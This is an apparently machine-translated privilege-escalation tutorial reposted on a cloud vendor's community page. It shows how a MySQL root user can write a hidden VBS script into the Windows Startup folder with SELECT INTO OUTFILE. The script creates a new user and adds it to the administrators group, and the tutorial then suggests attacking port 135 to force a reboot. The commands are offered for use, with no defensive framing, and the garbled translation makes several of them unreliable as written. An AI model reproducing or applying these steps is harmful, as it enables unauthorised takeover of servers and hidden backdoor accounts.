MySQL Database Root User Privilege Escalation

Source: Internet
Author: User

(This method can also be applied to webshell elevation. This method has been improved and will not pop up the black cmd window. It will be released in a short time !)

1. Connect MySQL Server
MySQL -U root-H
MySQL . Exe Program After you install MySQL In the bin directory
2. Let's take a look at some databases on the server.
MySQL > Show databases;
MySQL By default MySQL And Test Databases. If you see other databases, they are user-created databases.
3. Let's enter the database
MySQL > Use test;
We will enter the test database.
4. Check the data tables in the database.
MySQL > Show tables;
By default, no table exists in test.
The following are key parts:
5. Create a new table under the test database;
MySQL > Create Table A (CMD text );
Now, we have created a new table named A, which stores only one field, the field name is cmd, and the text is text.
6. insert content into the table
MySQL > Insert into a values ("set wshshell = Createobject (" "wscript. Shell "")");
MySQL > Insert into a values ("A = wshshell. Run (" "cmd.exe/C net user 1/Add" ", 0 )");
MySQL > Insert into a values ("B = wshshell. Run (" "cmd.exe/C net localgroup administrators 1/Add" ", 0 )");
Note that double quotation marks, Parentheses, and "0" must be entered! We will use these three commands to create a vbs script program!
7. Now let's look at what table A has.
MySQL > Select * From;
We will see three rows of data in the table, that is, the content we just entered. After confirming that the content you entered is correct, we will proceed to the next step.
8. The output table is a vbs script file.
MySQL > Select * from a into OUTFILE "C: \ release E ~ 1 \ alluse ~ 1 \ Start Menu \ Program \ Start \ A. vbs ";
We input the content in our table to the Startup Group, which is a vbs script file! Note the "\" symbol.
9. You must have known this, that is, using MySQL Output an executable file. Why not use bat, because there will be an obvious DOS window at startup, and the vbs script can completely hide the window without any error prompt! The script should have been deleted automatically after the script is completed, but the Chinese directory cannot be processed! Okay. Find a tool attack 135 and restart the server. In a few minutes, you will be the administrator.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.